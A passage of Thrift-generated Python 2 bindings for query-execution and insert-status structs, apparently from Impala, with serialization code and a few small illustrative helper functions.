      oprot.writeFieldEnd()
    if self.sender_id is not None:
      oprot.writeFieldBegin('sender_id', TType.I32, 6)
      oprot.writeI32(self.sender_id)
      oprot.writeFieldEnd()
    if self.debug_options is not None:
      oprot.writeFieldBegin('debug_options', TType.STRUCT, 7)
      self.debug_options.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.fragment_idx is None:
      raise TProtocol.TProtocolException(message='Required field fragment_idx is unset!')
    if self.fragment_instance_id is None:
      raise TProtocol.TProtocolException(message='Required field fragment_instance_id is unset!')
    if self.per_fragment_instance_idx is None:
      raise TProtocol.TProtocolException(message='Required field per_fragment_instance_idx is unset!')
    if self.per_node_scan_ranges is None:
      raise TProtocol.TProtocolException(message='Required field per_node_scan_ranges is unset!')
    if self.per_exch_num_senders is None:
      raise TProtocol.TProtocolException(message='Required field per_exch_num_senders is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
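# Illustrative sketch (not part of the generated interface): how the two
# required maps of TPlanFragmentInstanceCtx are shaped. per_node_scan_ranges
# maps a plan-node id (i32) to that instance's list of TScanRangeParams;
# per_exch_num_senders maps an exchange node id to its sender count. All ids
# and counts below are invented for illustration.
def _example_instance_ctx():
  ctx = TPlanFragmentInstanceCtx(
      fragment_idx=0,
      fragment_instance_id=Types.ttypes.TUniqueId(hi=1, lo=3),
      per_fragment_instance_idx=0,
      per_node_scan_ranges={0: [TScanRangeParams(scan_range=PlanNodes.ttypes.TScanRange())]},
      per_exch_num_senders={1: 2})
  ctx.validate()  # all five required fields are set above
  return ctx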
class TExecQueryFInstancesParams:
  """
  Attributes:
   - protocol_version
   - coord_state_idx
   - query_ctx
   - fragment_ctxs
   - fragment_instance_ctxs
   - min_reservation_bytes
   - initial_reservation_total_claims
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'protocol_version', None, None, ), # 1
    (2, TType.I32, 'coord_state_idx', None, None, ), # 2
    (3, TType.STRUCT, 'query_ctx', (TQueryCtx, TQueryCtx.thrift_spec), None, ), # 3
    (4, TType.LIST, 'fragment_ctxs', (TType.STRUCT,(TPlanFragmentCtx, TPlanFragmentCtx.thrift_spec)), None, ), # 4
    (5, TType.LIST, 'fragment_instance_ctxs', (TType.STRUCT,(TPlanFragmentInstanceCtx, TPlanFragmentInstanceCtx.thrift_spec)), None, ), # 5
    (6, TType.I64, 'min_reservation_bytes', None, None, ), # 6
    (7, TType.I64, 'initial_reservation_total_claims', None, None, ), # 7
  )

  def __init__(self, protocol_version=None, coord_state_idx=None, query_ctx=None, fragment_ctxs=None, fragment_instance_ctxs=None, min_reservation_bytes=None, initial_reservation_total_claims=None,):
    self.protocol_version = protocol_version
    self.coord_state_idx = coord_state_idx
    self.query_ctx = query_ctx
    self.fragment_ctxs = fragment_ctxs
    self.fragment_instance_ctxs = fragment_instance_ctxs
    self.min_reservation_bytes = min_reservation_bytes
    self.initial_reservation_total_claims = initial_reservation_total_claims

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.protocol_version = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I32:
          self.coord_state_idx = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.query_ctx = TQueryCtx()
          self.query_ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.LIST:
          self.fragment_ctxs = []
          (_etype56, _size53) = iprot.readListBegin()
          for _i57 in xrange(_size53):
            _elem58 = TPlanFragmentCtx()
            _elem58.read(iprot)
            self.fragment_ctxs.append(_elem58)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.LIST:
          self.fragment_instance_ctxs = []
          (_etype62, _size59) = iprot.readListBegin()
          for _i63 in xrange(_size59):
            _elem64 = TPlanFragmentInstanceCtx()
            _elem64.read(iprot)
            self.fragment_instance_ctxs.append(_elem64)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 6:
        if ftype == TType.I64:
          self.min_reservation_bytes = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 7:
        if ftype == TType.I64:
          self.initial_reservation_total_claims = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TExecQueryFInstancesParams')
    if self.protocol_version is not None:
      oprot.writeFieldBegin('protocol_version', TType.I32, 1)
      oprot.writeI32(self.protocol_version)
      oprot.writeFieldEnd()
    if self.coord_state_idx is not None:
      oprot.writeFieldBegin('coord_state_idx', TType.I32, 2)
      oprot.writeI32(self.coord_state_idx)
      oprot.writeFieldEnd()
    if self.query_ctx is not None:
      oprot.writeFieldBegin('query_ctx', TType.STRUCT, 3)
      self.query_ctx.write(oprot)
      oprot.writeFieldEnd()
    if self.fragment_ctxs is not None:
      oprot.writeFieldBegin('fragment_ctxs', TType.LIST, 4)
      oprot.writeListBegin(TType.STRUCT, len(self.fragment_ctxs))
      for iter65 in self.fragment_ctxs:
        iter65.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.fragment_instance_ctxs is not None:
      oprot.writeFieldBegin('fragment_instance_ctxs', TType.LIST, 5)
      oprot.writeListBegin(TType.STRUCT, len(self.fragment_instance_ctxs))
      for iter66 in self.fragment_instance_ctxs:
        iter66.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.min_reservation_bytes is not None:
      oprot.writeFieldBegin('min_reservation_bytes', TType.I64, 6)
      oprot.writeI64(self.min_reservation_bytes)
      oprot.writeFieldEnd()
    if self.initial_reservation_total_claims is not None:
      oprot.writeFieldBegin('initial_reservation_total_claims', TType.I64, 7)
      oprot.writeI64(self.initial_reservation_total_claims)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.protocol_version is None:
      raise TProtocol.TProtocolException(message='Required field protocol_version is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TExecQueryFInstancesResult:
  """
  Attributes:
   - status
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 1
  )

  def __init__(self, status=None,):
    self.status = status

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = Status.ttypes.TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TExecQueryFInstancesResult')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TParquetInsertStats:
  """
  Attributes:
   - per_column_size
  """

  thrift_spec = (
    None, # 0
    (1, TType.MAP, 'per_column_size', (TType.STRING,None,TType.I64,None), None, ), # 1
  )

  def __init__(self, per_column_size=None,):
    self.per_column_size = per_column_size

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.MAP:
          self.per_column_size = {}
          (_ktype68, _vtype69, _size67 ) = iprot.readMapBegin()
          for _i71 in xrange(_size67):
            _key72 = iprot.readString();
            _val73 = iprot.readI64();
            self.per_column_size[_key72] = _val73
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TParquetInsertStats')
    if self.per_column_size is not None:
      oprot.writeFieldBegin('per_column_size', TType.MAP, 1)
      oprot.writeMapBegin(TType.STRING, TType.I64, len(self.per_column_size))
      for kiter74,viter75 in self.per_column_size.items():
        oprot.writeString(kiter74)
        oprot.writeI64(viter75)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.per_column_size is None:
      raise TProtocol.TProtocolException(message='Required field per_column_size is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TKuduDmlStats:
  """
  Attributes:
   - num_row_errors
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'num_row_errors', None, None, ), # 1
  )

  def __init__(self, num_row_errors=None,):
    self.num_row_errors = num_row_errors

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.num_row_errors = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TKuduDmlStats')
    if self.num_row_errors is not None:
      oprot.writeFieldBegin('num_row_errors', TType.I64, 1)
      oprot.writeI64(self.num_row_errors)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TInsertStats:
  """
  Attributes:
   - bytes_written
   - parquet_stats
   - kudu_stats
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'bytes_written', None, None, ), # 1
    (2, TType.STRUCT, 'parquet_stats', (TParquetInsertStats, TParquetInsertStats.thrift_spec), None, ), # 2
    (3, TType.STRUCT, 'kudu_stats', (TKuduDmlStats, TKuduDmlStats.thrift_spec), None, ), # 3
  )

  def __init__(self, bytes_written=None, parquet_stats=None, kudu_stats=None,):
    self.bytes_written = bytes_written
    self.parquet_stats = parquet_stats
    self.kudu_stats = kudu_stats

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.bytes_written = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.parquet_stats = TParquetInsertStats()
          self.parquet_stats.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.kudu_stats = TKuduDmlStats()
          self.kudu_stats.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TInsertStats')
    if self.bytes_written is not None:
      oprot.writeFieldBegin('bytes_written', TType.I64, 1)
      oprot.writeI64(self.bytes_written)
      oprot.writeFieldEnd()
    if self.parquet_stats is not None:
      oprot.writeFieldBegin('parquet_stats', TType.STRUCT, 2)
      self.parquet_stats.write(oprot)
      oprot.writeFieldEnd()
    if self.kudu_stats is not None:
      oprot.writeFieldBegin('kudu_stats', TType.STRUCT, 3)
      self.kudu_stats.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.bytes_written is None:
      raise TProtocol.TProtocolException(message='Required field bytes_written is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
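# Illustrative sketch (not part of the generated interface): TInsertStats
# nests the format-specific stats structs, and only bytes_written is required
# by validate(). Column names and sizes below are invented.
def _example_insert_stats():
  stats = TInsertStats(
      bytes_written=4096,
      parquet_stats=TParquetInsertStats(per_column_size={'col_a': 2048, 'col_b': 2048}))
  stats.validate()
  return stats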
class TInsertPartitionStatus:
  """
  Attributes:
   - id
   - num_modified_rows
   - stats
   - partition_base_dir
   - kudu_latest_observed_ts
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'id', None, None, ), # 1
    (2, TType.I64, 'num_modified_rows', None, None, ), # 2
    (3, TType.STRUCT, 'stats', (TInsertStats, TInsertStats.thrift_spec), None, ), # 3
    (4, TType.STRING, 'partition_base_dir', None, None, ), # 4
    (5, TType.I64, 'kudu_latest_observed_ts', None, None, ), # 5
  )

  def __init__(self, id=None, num_modified_rows=None, stats=None, partition_base_dir=None, kudu_latest_observed_ts=None,):
    self.id = id
    self.num_modified_rows = num_modified_rows
    self.stats = stats
    self.partition_base_dir = partition_base_dir
    self.kudu_latest_observed_ts = kudu_latest_observed_ts

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.id = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I64:
          self.num_modified_rows = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.stats = TInsertStats()
          self.stats.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRING:
          self.partition_base_dir = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.I64:
          self.kudu_latest_observed_ts = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TInsertPartitionStatus')
    if self.id is not None:
      oprot.writeFieldBegin('id', TType.I64, 1)
      oprot.writeI64(self.id)
      oprot.writeFieldEnd()
    if self.num_modified_rows is not None:
      oprot.writeFieldBegin('num_modified_rows', TType.I64, 2)
      oprot.writeI64(self.num_modified_rows)
      oprot.writeFieldEnd()
    if self.stats is not None:
      oprot.writeFieldBegin('stats', TType.STRUCT, 3)
      self.stats.write(oprot)
      oprot.writeFieldEnd()
    if self.partition_base_dir is not None:
      oprot.writeFieldBegin('partition_base_dir', TType.STRING, 4)
      oprot.writeString(self.partition_base_dir)
      oprot.writeFieldEnd()
    if self.kudu_latest_observed_ts is not None:
      oprot.writeFieldBegin('kudu_latest_observed_ts', TType.I64, 5)
      oprot.writeI64(self.kudu_latest_observed_ts)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.partition_base_dir is None:
      raise TProtocol.TProtocolException(message='Required field partition_base_dir is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TInsertExecStatus:
  """
  Attributes:
   - files_to_move
   - per_partition_status
  """

  thrift_spec = (
    None, # 0
    (1, TType.MAP, 'files_to_move', (TType.STRING,None,TType.STRING,None), None, ), # 1
    (2, TType.MAP, 'per_partition_status', (TType.STRING,None,TType.STRUCT,(TInsertPartitionStatus, TInsertPartitionStatus.thrift_spec)), None, ), # 2
  )

  def __init__(self, files_to_move=None, per_partition_status=None,):
    self.files_to_move = files_to_move
    self.per_partition_status = per_partition_status

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.MAP:
          self.files_to_move = {}
          (_ktype77, _vtype78, _size76 ) = iprot.readMapBegin()
          for _i80 in xrange(_size76):
            _key81 = iprot.readString();
            _val82 = iprot.readString();
            self.files_to_move[_key81] = _val82
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.MAP:
          self.per_partition_status = {}
          (_ktype84, _vtype85, _size83 ) = iprot.readMapBegin()
          for _i87 in xrange(_size83):
            _key88 = iprot.readString();
            _val89 = TInsertPartitionStatus()
            _val89.read(iprot)
            self.per_partition_status[_key88] = _val89
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TInsertExecStatus')
    if self.files_to_move is not None:
      oprot.writeFieldBegin('files_to_move', TType.MAP, 1)
      oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.files_to_move))
      for kiter90,viter91 in self.files_to_move.items():
        oprot.writeString(kiter90)
        oprot.writeString(viter91)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    if self.per_partition_status is not None:
      oprot.writeFieldBegin('per_partition_status', TType.MAP, 2)
      oprot.writeMapBegin(TType.STRING, TType.STRUCT, len(self.per_partition_status))
      for kiter92,viter93 in self.per_partition_status.items():
        oprot.writeString(kiter92)
        viter93.write(oprot)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.files_to_move is None:
      raise TProtocol.TProtocolException(message='Required field files_to_move is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TErrorLogEntry:
  """
  Attributes:
   - count
   - messages
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'count', None, 0, ), # 1
    (2, TType.LIST, 'messages', (TType.STRING,None), None, ), # 2
  )

  def __init__(self, count=thrift_spec[1][4], messages=None,):
    self.count = count
    self.messages = messages

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.count = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.LIST:
          self.messages = []
          (_etype97, _size94) = iprot.readListBegin()
          for _i98 in xrange(_size94):
            _elem99 = iprot.readString();
            self.messages.append(_elem99)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TErrorLogEntry')
    if self.count is not None:
      oprot.writeFieldBegin('count', TType.I32, 1)
      oprot.writeI32(self.count)
      oprot.writeFieldEnd()
    if self.messages is not None:
      oprot.writeFieldBegin('messages', TType.LIST, 2)
      oprot.writeListBegin(TType.STRING, len(self.messages))
      for iter100 in self.messages:
        oprot.writeString(iter100)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TFragmentInstanceExecStatus:
  """
  Attributes:
   - fragment_instance_id
   - status
   - done
   - profile
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'fragment_instance_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 2
    (3, TType.BOOL, 'done', None, None, ), # 3
    (4, TType.STRUCT, 'profile', (RuntimeProfile.ttypes.TRuntimeProfileTree, RuntimeProfile.ttypes.TRuntimeProfileTree.thrift_spec), None, ), # 4
  )

  def __init__(self, fragment_instance_id=None, status=None, done=None, profile=None,):
    self.fragment_instance_id = fragment_instance_id
    self.status = status
    self.done = done
    self.profile = profile

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.fragment_instance_id = Types.ttypes.TUniqueId()
          self.fragment_instance_id.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.status = Status.ttypes.TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.BOOL:
          self.done = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRUCT:
          self.profile = RuntimeProfile.ttypes.TRuntimeProfileTree()
          self.profile.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TFragmentInstanceExecStatus')
    if self.fragment_instance_id is not None:
      oprot.writeFieldBegin('fragment_instance_id', TType.STRUCT, 1)
      self.fragment_instance_id.write(oprot)
      oprot.writeFieldEnd()
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 2)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.done is not None:
      oprot.writeFieldBegin('done', TType.BOOL, 3)
      oprot.writeBool(self.done)
      oprot.writeFieldEnd()
    if self.profile is not None:
      oprot.writeFieldBegin('profile', TType.STRUCT, 4)
      self.profile.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
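# Illustrative sketch (not part of the generated interface): TErrorLogEntry
# picks up its generated default of count=0 from thrift_spec, so only the
# message list needs supplying; the enclosing error_log map keys entries by an
# i32 error code. The code and message below are invented.
def _example_error_log():
  entry = TErrorLogEntry(messages=['scan failed'])
  assert entry.count == 0  # default comes from thrift_spec[1][4]
  return {1: entry}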
class TReportExecStatusParams:
  """
  Attributes:
   - protocol_version
   - query_id
   - coord_state_idx
   - instance_exec_status
   - insert_exec_status
   - error_log
   - status
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'protocol_version', None, None, ), # 1
    (2, TType.STRUCT, 'query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 2
    (3, TType.I32, 'coord_state_idx', None, None, ), # 3
    (4, TType.LIST, 'instance_exec_status', (TType.STRUCT,(TFragmentInstanceExecStatus, TFragmentInstanceExecStatus.thrift_spec)), None, ), # 4
    (5, TType.STRUCT, 'insert_exec_status', (TInsertExecStatus, TInsertExecStatus.thrift_spec), None, ), # 5
    (6, TType.MAP, 'error_log', (TType.I32,None,TType.STRUCT,(TErrorLogEntry, TErrorLogEntry.thrift_spec)), None, ), # 6
    (7, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 7
  )

  def __init__(self, protocol_version=None, query_id=None, coord_state_idx=None, instance_exec_status=None, insert_exec_status=None, error_log=None, status=None,):
    self.protocol_version = protocol_version
    self.query_id = query_id
    self.coord_state_idx = coord_state_idx
    self.instance_exec_status = instance_exec_status
    self.insert_exec_status = insert_exec_status
    self.error_log = error_log
    self.status = status

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.protocol_version = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.query_id = Types.ttypes.TUniqueId()
          self.query_id.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I32:
          self.coord_state_idx = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.LIST:
          self.instance_exec_status = []
